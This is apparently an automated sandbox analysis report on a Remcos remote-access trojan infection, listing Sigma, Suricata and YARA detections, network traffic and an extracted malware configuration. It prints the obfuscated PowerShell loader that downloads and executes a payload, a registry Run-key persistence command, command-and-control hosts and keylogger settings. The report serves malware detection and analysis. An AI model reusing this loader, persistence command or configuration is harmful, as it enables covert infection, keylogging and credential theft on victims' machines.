HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)", ProcessId: 1292, ProcessName: cmd.exe
                Sigma detected: Suspicious Copy From or To System Directory
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.take LnnaDan dPerfePapfrDeorsLerr[Adv $Tes,DVaesr rotiSvovkN
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.take LnnaDan dPerfePapfrDeorsLerr[Adv $Tes,DVaesr rotiSvovkN nck IndeVensvLodsaPapin H

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 1276, TargetFilename: C:\ProgramData\remcos\logs.dat

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-17T15:03:17.869346+020020229301A Network Trojan was detected20.12.23.50443192.168.2.549705TCP
                2024-10-17T15:03:57.350091+020020229301A Network Trojan was detected20.12.23.50443192.168.2.549909TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-17T15:03:46.027589+020020365941Malware Command and Control Activity Detected192.168.2.549848185.236.203.10151525TCP
                2024-10-17T15:03:47.902474+020020365941Malware Command and Control Activity Detected192.168.2.549859185.236.203.10151525TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-17T15:03:47.683447+020028033043Unknown Traffic192.168.2.549860178.237.33.5080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["pelele.duckdns.org:51525:1"], "Assigned name": "MISS Chy", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-TXCR8B", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000008.00000002.4525154442.000000002253E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4525112746.00000000224FD000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1276, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
                Source: unknownHTTPS traffic detected: 194.76.118.27:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.56.189:443 -> 192.168.2.5:49797 version: TLS 1.2
                Source: Binary string: System.Core.pdb4 source: powershell.exe, 00000005.00000002.2378968135.00000000085D1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: CallSite.Targetore.pdb;"b source: powershell.exe, 00000005.00000002.2378968135.00000000085A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.**Q source: msiexec.exe, 0000000F.00000002.2571532371.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.oeaccount* source: msiexec.exe, 0000000F.00000002.2571532371.0000000002FBA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: m.Core.pdbh source: powershell.exe, 00000005.00000002.2378968135.00000000085D1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: stem.Core.pdb source: powershell.exe, 00000005.00000002.2378968135.00000000085D1000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_228E10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_228E10F1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_228E6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,8_2_228E6580
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040AE51 FindFirstFileW,FindNextFileW,14_2_0040AE51
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407EF8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49848 -> 185.236.203.101:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49859 -> 185.236.203.101:51525
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: pelele.duckdns.org
                Uses dynamic DNS services
                Source: unknownDNS query: name: pelele.duckdns.org
                Source: global trafficTCP traffic: 192.168.2.5:49848 -> 185.236.203.101:51525
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 185.236.203.101 185.236.203.101
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: M247GB M247GB
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49860 -> 178.237.33.50:80
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49705
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49909
                Source: global trafficHTTP traffic detected: GET /Hovedvrket.rar HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: miottoezanella.comConnection: Keep-Alive
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /Hovedvrket.rar HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: miottoezanella.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /nwnNBPSeuTV8.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: msiexec.exe, 00000008.00000002.4525829481.00000000228B0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000012.00000002.2554415124.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: msiexec.exe, 0000000E.00000003.2576378628.0000000002D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: msiexec.exe, 0000000E.00000003.2576378628.0000000002D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: msiexec.exe, msiexec.exe, 00000012.00000002.2554415124.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: msiexec.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: msiexec.exe, 00000008.00000002.4528323110.0000000023130000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: msiexec.exe, 00000008.00000002.4528323110.0000000023130000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: miottoezanella.com
                Source: global trafficDNS traffic detected: DNS query: plieltd.top
                Source: global trafficDNS traffic detected: DNS query: pelele.duckdns.org
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: bhvC236.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: bhvC236.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                Source: bhvC236.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
                Source: bhvC236.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006AF0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp, bhvC236.tmp.14.drString found in binary or memory: http://geoplugin.net/json.gp
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp.
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                Source: powershell.exe, 00000002.00000002.2196657506.000001DCB1891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://miottoezanella.com
                Source: powershell.exe, 00000002.00000002.2234266355.000001DCBFB5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2364668825.0000000005C55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: bhvC236.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0:
                Source: bhvC236.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0H
                Source: bhvC236.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0I
                Source: bhvC236.tmp.14.drString found in binary or memory: http://ocsp.msocsp.com0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://ocsp.msocsp.com0S
                Source: bhvC236.tmp.14.drString found in binary or memory: http://ocspx.digicert.com0E
                Source: powershell.exe, 00000005.00000002.2345858403.0000000004D48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.2196657506.000001DCAFAF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2345858403.0000000004BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000005.00000002.2345858403.0000000004D48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: bhvC236.tmp.14.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://www.digicert.com/CPS0~
                Source: msiexec.exe, msiexec.exe, 00000012.00000002.2554415124.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: msiexec.exe, msiexec.exe, 00000012.00000002.2554661567.0000000002ABE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2554228868.0000000002ABC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000002.2554415124.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 00000012.00000003.2554251966.0000000002ABE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2554209398.0000000002ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                Source: msiexec.exe, 00000012.00000002.2554661567.0000000002ABE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2554228868.0000000002ABC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2554251966.0000000002ABE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2554209398.0000000002ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
                Source: msiexec.exe, 00000008.00000002.4525829481.00000000228B0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000012.00000002.2554415124.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: msiexec.exe, 00000008.00000002.4525829481.00000000228B0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000012.00000002.2554415124.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                Source: bhvC236.tmp.14.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696428304750
                Source: msiexec.exe, 0000000E.00000002.2577200402.0000000002A33000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                Source: msiexec.exe, 00000012.00000002.2554415124.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: bhvC236.tmp.14.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
                Source: bhvC236.tmp.14.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                Source: bhvC236.tmp.14.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                Source: bhvC236.tmp.14.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                Source: powershell.exe, 00000002.00000002.2196657506.000001DCAFAF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000005.00000002.2345858403.0000000004BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBeq
                Source: bhvC236.tmp.14.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: bhvC236.tmp.14.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
                Source: powershell.exe, 00000005.00000002.2364668825.0000000005C55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000005.00000002.2364668825.0000000005C55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
